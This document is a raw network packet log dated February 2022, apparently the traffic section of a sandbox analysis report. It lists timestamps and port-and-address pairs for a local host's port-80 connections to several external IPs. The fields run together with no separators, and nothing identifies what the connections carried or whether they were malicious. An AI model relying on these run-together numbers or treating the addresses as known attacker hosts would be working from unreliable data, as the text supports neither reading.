                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.050705910 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.050798893 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.051043987 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.051109076 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.051371098 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.051846981 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.051914930 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.051948071 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.052216053 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.052498102 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.052544117 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.052720070 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.052879095 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.053124905 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.053250074 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.053374052 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.053500891 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.053749084 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.053875923 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.054018021 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.054501057 CET804985145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.058981895 CET4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.123399019 CET804985245.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.123457909 CET804985245.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.123646975 CET4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.123708010 CET4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.228812933 CET804985245.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:00.229075909 CET4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.073898077 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.084340096 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.084523916 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.086414099 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.086520910 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.086648941 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.096888065 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.096972942 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097011089 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097071886 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097110033 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097146034 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097253084 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097281933 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097304106 CET804985534.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097362995 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097384930 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097399950 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097538948 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097593069 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097662926 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097680092 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097843885 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.098160982 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.107501030 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.107547045 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.107645035 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.107887030 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.107944012 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108045101 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108078003 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108108044 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108184099 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108351946 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108366013 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108534098 CET804985534.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108568907 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108597040 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108598948 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108649969 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108680964 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108711004 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108771086 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108819008 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108828068 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.109014988 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.109050035 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.109098911 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.109174967 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.109222889 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.109230995 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.109283924 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.109406948 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.109570980 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.118294001 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.118339062 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.118395090 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.118675947 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.118750095 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119021893 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119132042 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119400024 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119494915 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119579077 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119630098 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119724035 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119745016 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119784117 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119865894 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119918108 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119924068 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119951963 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.119992971 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120023966 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120156050 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120204926 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120223045 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120238066 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120273113 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120321989 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120353937 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120383024 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120395899 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120524883 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120532990 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120559931 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.120738983 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129069090 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129154921 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129208088 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129241943 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129318953 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129447937 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.129491091 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.130511045 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.130580902 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.130724907 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.130861998 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.130959988 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131019115 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131110907 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131149054 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131165028 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131180048 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131211042 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131211996 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131243944 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131300926 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131335020 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131365061 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131441116 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131690025 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131717920 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131795883 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131834030 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131865025 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131908894 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131985903 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.131990910 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132097006 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132157087 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132167101 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132204056 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132237911 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132246017 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132468939 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132644892 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.132771015 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139678001 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139744997 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139781952 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139827013 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139925003 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.139928102 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.140058994 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.140100956 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.140281916 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.141565084 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.141623974 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.141705990 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.141947031 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142004013 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142224073 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142330885 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142426968 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142540932 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142582893 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142605066 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142731905 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142769098 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142827988 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142833948 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142863035 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142920017 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142951012 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.142981052 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143009901 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143013954 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143186092 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143203974 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143244982 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143306017 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143337011 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143414021 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143449068 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143482924 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143543959 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143594980 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143646955 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143682003 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.143807888 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.150078058 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.150332928 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.150382042 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.150438070 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.150470018 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.152081966 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.152235031 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.152295113 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.152328968 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.152565002 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.152929068 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.153105974 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.153675079 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.153794050 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.153912067 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.154050112 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.154150009 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.154206991 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.154263020 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.159735918 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.257427931 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.257499933 CET804985434.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.257666111 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.257735968 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.268443108 CET804985534.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.268516064 CET804985534.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.269052029 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.269155979 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.279457092 CET804985534.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:14.125657082 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:14.125722885 CET8049833154.214.67.115192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:14.126080990 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:56:14.126178026 CET4983380192.168.11.20154.214.67.115
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.352778912 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.375601053 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.375865936 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.377640963 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.377743959 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.377856970 CET4985780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400484085 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400587082 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400630951 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400685072 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400695086 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400717974 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400749922 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400868893 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400908947 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400975943 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.401037931 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.401041031 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.401061058 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.401215076 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.401226044 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.401309967 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.403219938 CET804985735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.403448105 CET4985780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.403493881 CET4985780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.423474073 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.423521042 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.423721075 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.423760891 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.423765898 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.423813105 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.423882008 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.423897982 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.423993111 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.424082994 CET804985635.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.424149990 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.424217939 CET4985680192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.428231001 CET804985735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.428601980 CET804985735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.428646088 CET804985735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.428905010 CET4985780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.429049969 CET4985780192.168.11.2035.214.4.70
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.453619003 CET804985735.214.4.70192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.649221897 CET4986080192.168.11.2064.32.22.102
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.806302071 CET804986064.32.22.102192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.806662083 CET4986080192.168.11.2064.32.22.102
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.806749105 CET4986080192.168.11.2064.32.22.102
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.964124918 CET804986064.32.22.102192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.964276075 CET804986064.32.22.102192.168.11.20
